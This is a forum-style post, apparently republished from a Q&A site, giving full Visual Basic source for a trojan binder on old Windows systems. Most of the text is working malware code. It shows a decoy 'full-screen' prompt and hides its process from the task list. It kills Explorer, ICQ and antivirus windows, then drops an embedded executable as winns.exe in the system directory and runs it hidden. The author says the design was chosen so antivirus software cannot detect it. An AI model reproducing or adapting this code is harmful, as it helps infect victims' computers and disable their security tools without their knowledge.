Source code of a VB trojan bundler

Source: Internet
Author: User
This is from a long time ago, when I answered a question about using VB to bind a trojan. Some of the APIs can only be used on Win9x. The reply was as follows:

In fact, the file size does not need to be recorded. For convenience, I directly used a bundling tool to merge my program with the trojan, but the result was detected by antivirus software. Later I thought of putting the trojan into the resource file: when the program runs, it first kills the antivirus software's process and then releases the trojan. The effect was good, and the antivirus software could not detect it. The following is the source code of my program. There is also a lot of unrelated code in it, which I used for killing processes. GetDesktopWindow could be replaced entirely by EnumWindows, and the code could be reduced a lot.

Option Explicit

Dim wndNum As Long          ' number of windows found
Dim lpWnd(128) As String    ' array holding the titles of all windows

' set process priority
Private Declare Function SetPriorityClass Lib "kernel32" ( _
    ByVal hProcess As Long, _
    ByVal dwPriorityClass As Long _
) As Long

' get the current process
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long

' lowest priority: the process runs when the computer is idle
Private Const IDLE_PRIORITY_CLASS = &H40

' register the process as a service process; not available on Windows 2000
Private Declare Function RegisterServiceProcess Lib "kernel32" ( _
    ByVal hProcess As Long, _
    ByVal uFlags As Long _
) As Long

' get the current process ID
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long

' used in this program to block hotkeys
Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" ( _
    ByVal uAction As Long, _
    ByVal uParam As Long, _
    ByRef lpvParam As Any, _
    ByVal fuWinIni As Long _
) As Long

' blocks hotkeys; has no effect on Windows 2000
Private Const SPI_SCREENSAVERRUNNING = 97

' set the form as topmost
Private Declare Function SetWindowPos Lib "user32" ( _
    ByVal hwnd As Long, _
    ByVal hWndInsertAfter As Long, _
    ByVal x As Long, _
    ByVal y As Long, _
    ByVal cx As Long, _
    ByVal cy As Long, _
    ByVal wFlags As Long _
) As Long

' place the form in front of all others
Private Const HWND_TOPMOST = -1

' get the desktop handle
Private Declare Function GetDesktopWindow Lib "user32" () As Long

' get a window handle
Private Declare Function GetWindow Lib "user32" ( _
    ByVal hwnd As Long, _
    ByVal wCmd As Long _
) As Long

' get the child window handle
Private Const GW_CHILD = 5
' get the next window handle
Private Const GW_HWNDNEXT = 2

' get the window title
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" ( _
    ByVal hwnd As Long, _
    ByVal lpString As String, _
    ByVal cch As Long _
) As Long

' send messages to close specified programs, such as antivirus software
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" ( _
    ByVal hwnd As Long, _
    ByVal wMsg As Long, _
    ByVal wParam As Long, _
    ByVal lParam As Long _
) As Long

' close program
Private Const WM_CLOSE = &H10
' exit program
Private Const WM_QUIT = &H12

' find a window
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" ( _
    ByVal lpClassName As String, _
    ByVal lpWindowName As String _
) As Long

' get the class name
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" ( _
    ByVal hwnd As Long, _
    ByVal lpClassName As String, _
    ByVal nMaxCount As Long _
) As Long

' delay, to make sure the program has closed
Private Declare Sub Sleep Lib "kernel32" ( _
    ByVal dwMilliseconds As Long _
)

' get the Windows system directory
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" ( _
    ByVal lpBuffer As String, _
    ByVal nSize As Long _
) As Long

' destroy the window and release its memory
Private Declare Function DestroyWindow Lib "user32" ( _
    ByVal hwnd As Long _
) As Long

' close the handle and release its memory
Private Declare Function CloseHandle Lib "kernel32" ( _
    ByVal hObject As Long _
) As Long

' enumerate windows
Private Declare Function EnumWindows Lib "user32" ( _
    ByVal lpEnumFunc As Long, _
    ByVal lParam As Long _
) As Long

Private Sub Form_Load()
    ' only run one instance of the application
    If App.PrevInstance = True Then End
    ' set the form as topmost (SetWindowPos takes seven arguments)
    SetWindowPos Me.hwnd, HWND_TOPMOST, 0, 0, 0, 0, 0
    ' give the user a prompt
    MsgBox "Runs in full-screen mode. Please close all programs " & _
           "for the best effect!", vbInformation Or vbSystemModal
    ' disable the hotkeys
    SystemParametersInfo SPI_SCREENSAVERRUNNING, True, 0, 0
    ' center the image
    Img.Move (Screen.Width - Img.Width) / 2, _
             (Screen.Height - Img.Height) / 2
    Fra(0).Move Img.Left - Fra(0).Width - 600
    Fra(1).Move Img.Left + Img.Width + 600
    ' get the process and set its priority to idle
    SetPriorityClass GetCurrentProcess, IDLE_PRIORITY_CLASS
    ' get the process ID and register it as a service process, so that the
    ' process is invisible after pressing Ctrl+Alt+Del. App.TaskVisible = False
    ' could also be used directly, but the effect is not as good.
    ' Note that this API is not supported on Windows 2000.
    RegisterServiceProcess GetCurrentProcessId, 1
    ' refresh the window list
    RefreshProcess
    ' kill the browser
    Do While KillProcess("Explorer") <> 0
    Loop
    ' kill folder and Internet Explorer windows (matched by class name)
    Do While KillProcess("wclass", True) <> 0
    Loop
    Do While KillProcess("systemtr", True) <> 0
    Loop
    ' kill OICQ
    Do While KillProcess("ICQ") <> 0
    Loop
    ' kill antivirus software
    Do While KillProcess("poison") <> 0
    Loop
    Do While KillProcess("Overlord") <> 0
    Loop
    ' release the executable stored in the resource file
    WriteExe
End Sub

' refresh the list of all windows
Private Sub RefreshProcess()
    Dim retWnd As Long              ' window handle
    Dim dskWnd As Long              ' desktop handle
    Dim lpTitle As String * 128     ' window title
    ' clear the window names kept in the array
    For wndNum = LBound(lpWnd) To UBound(lpWnd)
        lpWnd(wndNum) = ""
    Next wndNum
    ' initialize the window count
    wndNum = 0
    ' get the desktop handle
    dskWnd = GetDesktopWindow()
    ' get the desktop's first child window
    retWnd = GetWindow(dskWnd, GW_CHILD)
    ' list all windows
    Do While retWnd <> 0
        ' get the window title
        GetWindowText retWnd, lpTitle, Len(lpTitle)
        ' save the title to the array
        If Left(lpTitle, 1) <> vbNullChar Then
            lpWnd(wndNum) = Left(lpTitle, InStr(1, lpTitle, vbNullChar) - 1)
            wndNum = wndNum + 1
        End If
        ' get the next window
        retWnd = GetWindow(retWnd, GW_HWNDNEXT)
    Loop
End Sub

' close every window whose title (or class name) contains the keyword;
' returns the number of windows closed
Private Function KillProcess(keyword As String, _
                             Optional isClass As Boolean = False) As Long
    Dim lpClassName As String * 128
    Dim className As String
    Dim fndWnd As Long
    Dim wndHdc As Long
    KillProcess = 0
    ' lpWnd holds wndNum titles at indexes 0 .. wndNum - 1
    For fndWnd = 0 To wndNum - 1
        ' determine whether the keyword is a class name
        If isClass = True Then
            ' get the window handle
            wndHdc = FindWindow(vbNullString, lpWnd(fndWnd))
            ' get the class name into the buffer
            GetClassName wndHdc, lpClassName, Len(lpClassName)
            ' parse the class name
            className = Left(lpClassName, InStr(1, lpClassName, vbNullChar) - 1)
            ' close it once found. Sometimes WM_QUIT alone does not finish the
            ' job, so WM_CLOSE is tried as well (see QuitDestroy).
            If InStr(1, className, keyword) > 0 Then
                wndHdc = FindWindow(className, vbNullString)
                KillProcess = KillProcess + 1
                QuitDestroy wndHdc
            End If
        ' otherwise match windows whose title contains the keyword
        ElseIf InStr(1, lpWnd(fndWnd), keyword) > 0 Then
            wndHdc = FindWindow(vbNullString, lpWnd(fndWnd))
            KillProcess = KillProcess + 1
            QuitDestroy wndHdc
        End If
    Next fndWnd
End Function

' write the executable stored in the resource file to disk and run it
Private Sub WriteExe()
    Dim exeData() As Byte
    Dim fileNum As Long
    Dim sysDir As String * 128
    GetSystemDirectory sysDir, Len(sysDir)
    exeData = LoadResData("loveme", "execute")
    fileNum = FreeFile()
    Open Left(sysDir, InStr(1, sysDir, vbNullChar) - 1) & "\winns.exe" _
        For Binary As #fileNum
    Put #fileNum, , exeData
    Close #fileNum
    Shell Left(sysDir, InStr(1, sysDir, vbNullChar) - 1) & "\winns.exe", vbHide
End Sub

' close and destroy a window
Private Sub QuitDestroy(wnd As Long)
    PostMessage wnd, WM_QUIT, 0, 0
    PostMessage wnd, WM_CLOSE, 0, 0
    DestroyWindow wnd
    CloseHandle wnd
    ' refresh the window list again; this is needed so the caller can tell
    ' whether the window still exists, otherwise the kill loop cannot finish
    RefreshProcess
End Sub
